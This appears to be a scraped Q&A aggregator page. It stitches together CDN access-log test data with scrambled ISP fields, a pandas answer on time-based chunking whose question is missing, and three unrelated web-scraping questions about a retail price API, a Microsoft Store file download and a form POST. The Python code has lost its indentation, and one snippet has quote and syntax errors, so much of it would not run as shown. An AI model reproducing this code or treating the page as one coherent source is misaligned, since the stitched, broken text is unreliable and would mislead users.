{"#timestamp":"2018-04-17T08:12:43.000Z","ISP":"tariirs oftpooorCoMcn","cache_result":"ERR_CLIENT_ABORT","client_ip":"173.38.196.130","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit\/537.51.1 (KHTML, like Gecko) Version\/7.0 Mobile\/11A465 Safari\/9537.53 BingPreview\/1.0b","client_url":"\/amp_preconnect_polyfill_404_or_other_error_expected._Do_not_worry_about_it","client_user":"-","content_type":"text\/html","device":"Spider","dnet":"1ceetlfd","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":404,"major":1.0,"os":"iOS","os_name":"iOS","querystring":"?1523952720000","reply_length_bytes":43261,"ts_process_time":1075,"ts_timestamp":"17\/Apr\/2018:08:12:43 -0000","type":"testdata","ua_name":"BingPreview"}
{"#timestamp":"2018-04-17T08:12:44.000Z","ISP":"i.nae,crHntc uiEcrlr ecI","cache_result":"TCP_REFRESH_HIT","client_ip":"217.198.69.197","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/04\/dong-tam-bat-giu-cong-an-640x360.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"1teedfcl","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":38627,"ts_process_time":228,"ts_timestamp":"17\/Apr\/2018:08:12:44 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:45.000Z","ISP":"c rcEn.,er reHciulitcanI","cache_result":"TCP_MISS","client_ip":"204.99.48.109","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/04\/TMDuc.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"ceteldf1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":206,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":141770,"ts_process_time":512,"ts_timestamp":"17\/Apr\/2018:08:12:45 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:47.000Z","ISP":"Ht, eri enaErurcIcc.ciln","cache_result":"TCP_REFRESH_HIT","client_ip":"20.204.32.235","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/03\/f1-13.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"tecfe1dl","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":161573,"ts_process_time":593,"ts_timestamp":"17\/Apr\/2018:08:12:47 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:47.000Z","ISP":"Ei .ne,cHncrterarilccu I","cache_result":"TCP_REFRESH_HIT","client_ip":"224.60.44.234","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/04\/f1-9-177x142.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"1fecldet","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":10410,"ts_process_time":170,"ts_timestamp":"17\/Apr\/2018:08:12:47 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:48.000Z","ISP":"irre,n Iec.rciu ntlcHacE","cache_result":"TCP_REFRESH_HIT","client_ip":"68.18.239.120","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","client_user":"-","content_type":"image\/gif","device":"Other","dnet":"fcledet1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":847,"ts_process_time":89,"ts_timestamp":"17\/Apr\/2018:08:12:48 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:21:23.000Z","ISP":"nnH rGmelbeen iOHzt","cache_result":"TCP_MISS","client_ip":"234.197.117.162","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\/534.58.2 (KHTML, like Gecko) Version\/5.1.8 Safari\/534.58.2","client_url":"\/Nhin-Thay-Gi-Tu-Mot-Hoi-Nghi.html","client_user":"-","content_type":"text\/html","device":"Other","dnet":"1ecfeldt","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":301,"major":5.0,"os":"Mac OS X","os_name":"Mac OS X","querystring":null,"reply_length_bytes":0,"ts_process_time":523,"ts_timestamp":"17\/Apr\/2018:08:21:23 -0000","type":"testdata","ua_name":"Safari"}
{"#timestamp":"2018-04-17T08:22:03.000Z","ISP":"Tx osoy1bcy dPdx hreah ia nOo ra-et51XsiaPttt","cache_result":"ERR_CLIENT_ABORT","client_ip":"218.202.132.77","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Linux; Android 5.1; A1601 Build\/LMY47I; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/64.0.3282.137 Mobile Safari\/537.36 [FB_IAB\/FB4A;FBAV\/166.0.0.66.95;]","client_url":"\/bat-binh-voi-toa-an-len-lut-giao-hat-van-hanh-noi-lua-hiep-thong-voi-tu-nhan-luong-tam\/","client_user":"-","content_type":"text\/html","device":"A1601","dnet":"ftee1dlc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":301,"major":166.0,"os":"Android","os_name":"Android","querystring":null,"reply_length_bytes":17707,"ts_process_time":31255,"ts_timestamp":"17\/Apr\/2018:08:22:03 -0000","type":"testdata","ua_name":"Facebook"}
{"#timestamp":"2018-04-17T08:21:25.000Z","ISP":"ne z briltHmOnHGeen","cache_result":"TCP_MISS","client_ip":"69.10.61.78","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\/534.58.2 (KHTML, like Gecko) Version\/5.1.8 Safari\/534.58.2","client_url":"\/nhin-thay-gi-tu-mot-hoi-nghi\/","client_user":"-","content_type":"text\/html","device":"Other","dnet":"cfdt1lee","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":5.0,"os":"Mac OS X","os_name":"Mac OS X","querystring":null,"reply_length_bytes":19351,"ts_process_time":1302,"ts_timestamp":"17\/Apr\/2018:08:21:25 -0000","type":"testdata","ua_name":"Safari"}
{"#timestamp":"2018-04-17T08:21:29.000Z","ISP":"gooLLeG lC","cache_result":"TCP_HIT","client_ip":"167.182.156.107","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (compatible; Google-Apps-Script)","client_url":"\/-","client_user":"-","content_type":"text\/html","device":"Other","dnet":"cee1tfld","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":null,"os":"Other","os_name":"Other","querystring":null,"reply_length_bytes":16962,"ts_process_time":0,"ts_timestamp":"17\/Apr\/2018:08:21:29 -0000","type":"testdata","ua_name":"Other"}
{"#timestamp":"2018-04-17T08:21:28.000Z","ISP":"eLLol GCgo","cache_result":"TCP_HIT","client_ip":"207.89.148.171","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (compatible; Google-Apps-Script)","client_url":"\/-","client_user":"-","content_type":"text\/html","device":"Other","dnet":"c1dleeft","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":null,"os":"Other","os_name":"Other","querystring":null,"reply_length_bytes":16962,"ts_process_time":0,"ts_timestamp":"17\/Apr\/2018:08:21:28 -0000","type":"testdata","ua_name":"Other"}
{"#timestamp":"2018-04-17T08:28:51.000Z","ISP":"oeClL LgoG","cache_result":"TCP_IMS_HIT","client_ip":"98.217.204.182","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Linux; Android 6.0.1; Nexus 5X Build\/MMB29P) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2272.96 Mobile Safari\/537.36 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html)","client_url":"\/wp-content\/plugins\/accelerated-mobile-pages\/templates\/design-manager\/design-3\/fonts\/ptserif\/PT_Serif-Web-Regular.ttf","client_user":"-","content_type":"-","device":"Spider","dnet":"efd1etlc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":304,"major":2.0,"os":"Android","os_name":"Android","querystring":null,"reply_length_bytes":0,"ts_process_time":0,"ts_timestamp":"17\/Apr\/2018:08:28:51 -0000","type":"testdata","ua_name":"Googlebot"}
With the following toy dataframe:
import pandas as pd
df = pd.DataFrame(
{
"timestamp": [
"2018-04-17T08:12:32.000Z",
"2018-04-17T08:11:33.000Z",
"2018-04-17T08:14:31.000Z",
"2018-04-17T08:25:35.000Z",
"2018-04-17T08:16:36.000Z",
"2018-04-17T08:10:42.000Z",
"2018-04-17T08:18:38.000Z",
"2018-04-17T08:09:29.000Z",
"2018-04-17T08:30:40.000Z",
"2018-04-17T08:21:21.000Z",
],
"value": [9, 2, 3, 4, 7, 8, 1, 2, 0, 3],
}
)
Here is one way to do it by defining a generator function:
def chunk(df, delta_in_min):
"""Helper function.
Args:
df: dataframe to split in chunks.
delta_in_min: size of chunk in minute (at least one).
Yields:
Chunk of input dataframe of the given size.
"""
start = df.index[0]
while True:
if delta_in_min <= 0:
yield df
break
end = start + pd.Timedelta(value=delta_in_min, unit="m")
if end > df.index[-1]:
yield df.loc[(df.index >= start), :]
break
yield df.loc[(df.index >= start) & (df.index < end), :]
start = end
if start > df.index[-1]:
break
And then:
df["timestamp"] = pd.to_datetime(df["timestamp"], infer_datetime_format=True)
df = df.set_index("timestamp").sort_index()
From here, you can call print(next(chunk(df, 2))) repeatedly to get each chunk or use a for loop, like this:
for s in chunk(df, 2):
print(s)
# Output
value
timestamp
2018-04-17 08:09:29+00:00 2
2018-04-17 08:10:42+00:00 8
value
timestamp
2018-04-17 08:11:33+00:00 2
2018-04-17 08:12:32+00:00 9
value
timestamp
2018-04-17 08:14:31+00:00 3
value
timestamp
2018-04-17 08:16:36+00:00 7
value
timestamp
2018-04-17 08:18:38+00:00 1
value
timestamp
2018-04-17 08:21:21+00:00 3
Empty DataFrame
Columns: [value]
Index: []
Empty DataFrame
Columns: [value]
Index: []
value
timestamp
2018-04-17 08:25:35+00:00 4
Empty DataFrame
Columns: [value]
Index: []
value
timestamp
2018-04-17 08:30:40+00:00 0

Webscraping website - can't print price - api & json i think

having trouble with this website to print price, i think i'm close but getting errors.
please help, tx
"
{'statusDetails': {'state': 'FAILURE', 'errorCode': 'SYS-3003', 'correlationid': 'rrt-5636881267628447407-b-gsy1-18837-18822238-1', 'description': 'Invalid key identifier or token'}}
"
code:
import requests
import json
s = requests.Session()
url = 'https://www.bunnings.com.au/ozito-pxc-2-x-18v-cordless-line-trimmer-skin-only_p0167719'
header = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'}
resp = s.get(url,headers=header)
api_url = f'https://api.prod.bunnings.com.au/v1/products/0167719/fulfillment/6400/radius/100000?isToggled=true'
price_resp = s.get(api_url,headers=header).json()
print(price_resp)
#price = price_resp['data']['price']['value']
#print(price)

Download Access Denied

Introduction
Hi! Im trying to download application content-types from Microsoft TLU Delivery. Upon downloading, its always resulted with corrupted files. The downloaded files just have 1kb size, meanwhile the original ones have 200kb+. I already trying to use custom headers and cookies on the Download Module but its still the same. Here's my network connection that i get from chrome console :
Request URL: http://tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f7ded4c4-f468-4bdc-96f0-03fd60c5ae81?p1=1604760658&p2=402&p3=2&p4=hcdsxul%2f8qkk8gjjjyomq0ki%2bxwjxulxxeninyf1jqrp3%2bsnzk%2fpwk4dgsnbkfzkzoor4%2bvaixilmxk6r%2bz6%2ba%3d%3d
Request Method: GET
Status Code: 200 OK
Remote Address: 8.241.131.254:80
Referrer Policy: strict-origin-when-cross-origin
#Response Header
Accept-Ranges: bytes
Age: 240667
Cache-Control: public, max-age=17280000
Connection: keep-alive
Content-Disposition: attachment; filename=Microsoft.Services.Store.Engagement_10.0.19011.0_x64__8wekyb3d8bbwe.Appx
Content-Length: 281728
Content-Type: application/octet-stream
Date: Sat, 21 Nov 2020 22:49:40 GMT
ETag: "cP6LQFFTB9bLaXCyN/YHr8kWbqM="
Expires: Wed, 09 Jun 2021 22:49:58 GMT
g: g
Last-Modified: Wed, 30 Jan 2019 14:28:15 GMT
MS-CorrelationId: c93312f7-dc52-41ef-b2d2-9294c1deda19
MS-CV: /24yhmSg0EivGZOl.0.3.8.2.1.0.0.22.2.6.2.1.1.0
MS-RequestId: 9378576c-a791-4636-93bf-7b8ef57c85a3
MSRegion: APAC
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
x-ccc: SG
x-cid: 3
X-MS-Ref-OriginShield: Ref A: 4127806A5D794419ACF51D29DD883F50 Ref B: BAYEDGE0319 Ref C: 2019-01-30T14:32:41Z
X-MSEdge-Ref: Ref A: 6F76857D59174A4BA37F3076DE6671DC Ref B: SJCEDGE0406 Ref C: 2019-01-30T14:32:41Z
X-Powered-By: ASP.NET
#Request header
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id;q=0.8,pt;q=0.7
Connection: keep-alive
Cookie: _ga=GA1.2.282065737.1604285823; MUID=07B92E6562A266AE0A83211366A260EF; AAMC_mscom_0=REGION%7C3; aam_uuid=33272659623977483402062764826775668547; mbox=PC#f8f94dce007c4a3c88788082771689c3.38_0#1668947906|session#af45a09527ce4486be93aff7c2a9adf1#1605704965; _cs_c=0; _cs_id=cd07a4b3-19b2-a8c7-95e4-7b8fd7c286f9.1605703107.1.1605703107.1605703107.1594299326.1639867107380.Lax.0; _uetvid=c457b5101e8a11eb956e2f93309fcf0c; IR_PI=f62c6991-299a-11eb-980c-0abbe301118c%7C1605789507507
DNT: 1
Host: tlu.dl.delivery.mp.microsoft.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
#Query String
p1: 1604760658
p2: 402
p3: 2
p4: hcdsxul/8qkk8gjjjyomq0ki+xwjxulxxeninyf1jqrp3+snzk/pwk4dgsnbkfzkzoor4+vaixilmxk6r+z6+a==
Problematic
Here's several download module that i've try:
from clint import textui
from clint.textui import progress
import urllib.request
import requests
from tqdm import tqdm
from urllib.request import FancyURLopener
from tqdm import tqdm
class DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def CookDown(url, filename):
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'}
cookies = {'_ga': 'GA1.2.282065737.1604285823', 'MUID': '07B92E6562A266AE0A83211366A260EF','aam_uuid': '33272659623977483402062764826775668547','AAMC_mscom_0': 'REGION%7C3','_cs_c': '0','_cs_id': 'cd07a4b3-19b2-a8c7-95e4-7b8fd7c286f9.1605703107.1.1605703107.1605703107.1594299326.1639867107380.Lax.0','_uetvid': 'c457b5101e8a11eb956e2f93309fcf0c','IR_PI': 'f62c6991-299a-11eb-980c-0abbe301118c%7C1605789507507','mbox': 'PC#f8f94dce007c4a3c88788082771689c3.38_0#1668947906|session#af45a09527ce4486be93aff7c2a9adf1#1605704965'}
try:
read = requests.get(url, headers=headers, cookies=cookies)
with open(filename, 'wb') as w:
for chunk in read.iter_content(chunk_size=None):
if chunk:
w.write(chunk)
print(filename + ' downloaded successfully!!!')
except urllib.request.URLError as e:
print("Error :%s" % e)
def Cookdone(url, filename):
r = requests.get(url, stream=True)
with open(filename, "wb") as f:
for data in tqdm(response.iter_content()):
f.write(data)
def Cookdown(url, filename):
#headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'}
#cookies = {'_ga': 'GA1.2.282065737.1604285823', 'MUID': '07B92E6562A266AE0A83211366A260EF','aam_uuid': '33272659623977483402062764826775668547','AAMC_mscom_0': 'REGION%7C3','_cs_c': '0','_cs_id': 'cd07a4b3-19b2-a8c7-95e4-7b8fd7c286f9.1605703107.1.1605703107.1605703107.1594299326.1639867107380.Lax.0','_uetvid': 'c457b5101e8a11eb956e2f93309fcf0c','IR_PI': 'f62c6991-299a-11eb-980c-0abbe301118c%7C1605789507507','mbox': 'PC#f8f94dce007c4a3c88788082771689c3.38_0#1668947906|session#af45a09527ce4486be93aff7c2a9adf1#1605704965'}
import shutil
req = requests.get(url, stream=True)
print(req.headers)
with open(filename, "wb") as f:
req.raw.decode_content = False
shutil.copyfileobj(req.raw, f)
def download(url, path):
opener = FancyURLopener({})
opener.version = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'
opener.retrieve(url, path)
def down(url, filename):
proxy = ProxyHandler({})
opener = build_opener(proxy)
opener.addheaders = [('User-Agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30')]
install_opener(opener)
urlretrieve(url, filename)
def DownLoad(url, filename):
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'}
r = requests.get(url, allow_redirects=True, headers=headers)
with open(filename, 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
def DoneLoad():
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'}
r = requests.get(url, allow_redirects=True, headers=headers)
with open(filename, 'wb') as f:
total_length = int(r.headers.get('content-length'))
for chunk in progress.bar(r.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):
if chunk:
f.write(chunk)
f.flush()
def Download(url, path):
hdr = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' }
req = urllib.request.Request(url, headers=hdr)
urllib.request.urlretrieve(req, path)
def downLoader(url, output_path):
with DownloadProgressBar(unit='B', unit_scale=True,
miniters=1, desc=url.split('/')[-1]) as t:
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36')]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)
def downLoad(url, output_path):
hdr = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' }
r = requests.get(url, headers=hdr, verify=False, stream=True)
with open(output_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=None):
f.write(chunk)
Here's piece of code to execute every each module :
CookDown('http://tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f7ded4c4-f468-4bdc-96f0-03fd60c5ae81?p1=1604760658&p2=402&p3=2&p4=hcdsxul%2f8qkk8gjjjyomq0ki%2bxwjxulxxeninyf1jqrp3%2bsnzk%2fpwk4dgsnbkfzkzoor4%2bvaixilmxk6r%2bz6%2ba%3d%3d','Microsoft.Services.Store.Engagement_10.0.19011.0_x64__8wekyb3d8bbwe.appx')
Using each module, resulted on the same corrupted file. Any answers will hugely appreciated because im stuck and doesnt have any ideas anymore. Please stackoverflow gods...Come here :D

I can't send form data to Python Jupyter

I try to build a python script which sends a POST with parameters for extracting the result, but I don't know where is my problem or why I can't get the page result with the html that I need...
import requests
url = ('https://ar.ec.universal-assistance.com/cotizar-asistencia-al-viajero')
data = {
'__RequestVerificationToken':'QWsTn0wqFmW9_jFfaBuuOjaWM4TE2Xk1XGn-oDTp0TENBO725YSkGnK8WeiAN53-jiPnjTDJ6zbZQjb6SzpprdCT4OlJg9jjZJKx1Wh7fGkZ5yCLkArUWCp6AIwq0t12gsonhP3orHzFJ2_1YqvIfJMcnzn2aXCb1-ZrDOzHM701',
'CCTLD':'.ar',
'CodigoOrganizacion':"",
'CodigoConvenio':"",
'OcultarTipoViaje':'false',
'CantidadPasajeros':1,
'CantidadDias':3,
'Origen':'ARGENTINA',
'Destino':'Centro america/Caribe',
'TipoViaje':'Un viaje',
'FechaInicio':'20/06/2019',
'FechaFin':'22/06/2019',
'Edad1':27,
'Edad2':"",
'Edad3':"",
'Edad4':"",
'Edad5':"",
'Edad6':"",
'Edad7':"",
'Edad8':"",
'Edad9':"",
'Edad10':"",
'Email':'no#no.com',
'Nombre':'PEDRO',
'Apellido':'PEREZ',
'CodigoArea':800,
'NumeroTelefono':9997777,
'dr':"",
'cn':'(direct)',
'cs':'(direct)',
'cm':'(none)',
'ck':'(not set 5)',
'cc':'(not set 5)',
'ua':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'ref':'ar.ec.universal-assistance.com',
'sr':'1366x768',
'vp':'1366x728'
}
resp = requests.post(url = url, data = data )
print(resp.text)
And I tried:
import requests
url = ('https://ar.ec.universal-assistance.com/cotizar-asistencia-al-viajero')
header = {
":authority": "ar.ec.universal-assistance.com",
":method": "POST",
":path": "/cotizar-asistencia-al-viajero",
":scheme": "https",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
"accept-encoding": "gzip, deflate, br",
"accept-language": "es-ES,es;q=0.9",
"cache-control": "max-age=0",
"content-length": "921",
"content-type": "application/x-www-form-urlencoded",
"cookie":"__cfduid=db577552fb94c6b34d51ff081f56060601559763003; _ga=GA1.2.1051767382.1559763017; _fbp=fb.1.1559763016835.1821187230; ASP.NET_SessionId=zirpp0zdbsvt4p102zvfknic; __RequestVerificationToken=RuGNfaFUJxBI4FDOaVsMJBdBNwbqzUt_AMjdUu6Am3T6kpBrZ5__wM8CiDO3Ttw6z6iBseVrGvzsyD-GCoWI2XRuhHpJB3-qu7qXvjoDu3NQL6onXupDL1E4ZkUXuHpDSPi0mjQ7F5PSFf2l_SGtDA2; _gid=GA1.2.1308535569.1560799988; _gat=1",
"origin": "https://ar.ec.universal-assistance.com",
"referer": "https://ar.ec.universal-assistance.com/cotizar-asistencia-al-viajero",
"upgrade-insecure-requests": 1,
"user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
},
data = {
'__RequestVerificationToken':'QWsTn0wqFmW9_jFfaBuuOjaWM4TE2Xk1XGn-oDTp0TENBO725YSkGnK8WeiAN53-jiPnjTDJ6zbZQjb6SzpprdCT4OlJg9jjZJKx1Wh7fGkZ5yCLkArUWCp6AIwq0t12gsonhP3orHzFJ2_1YqvIfJMcnzn2aXCb1-ZrDOzHM701',
'CCTLD':'.ar',
'CodigoOrganizacion':"",
'CodigoConvenio':"",
'OcultarTipoViaje':'false',
'CantidadPasajeros':1,
'CantidadDias':3,
'Origen':'ARGENTINA',
'Destino':'Centro america/Caribe',
'TipoViaje':'Un viaje',
'FechaInicio':'20/06/2019',
'FechaFin':'22/06/2019',
'Edad1':27,
'Edad2':"",
'Edad3':"",
'Edad4':"",
'Edad5':"",
'Edad6':"",
'Edad7':"",
'Edad8':"",
'Edad9':"",
'Edad10':"",
'Email':'no#no.com',
'Nombre':'PEDRO',
'Apellido':'PEREZ',
'CodigoArea':800,
'NumeroTelefono':9997777,
'dr':"",
'cn':'(direct)',
'cs':'(direct)',
'cm':'(none)',
'ck':'(not set 5)',
'cc':'(not set 5)',
'ua':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'ref':'ar.ec.universal-assistance.com',
'sr':'1366x768',
'vp':'1366x728'
}
resp = requests.post(url = url, data = data )
print(resp.text)
I expect the html of "https://ar.ec.universal-assistance.com/ofertas-asistencia-al-viajero"
That would be the next page from first url.

Categories

Resources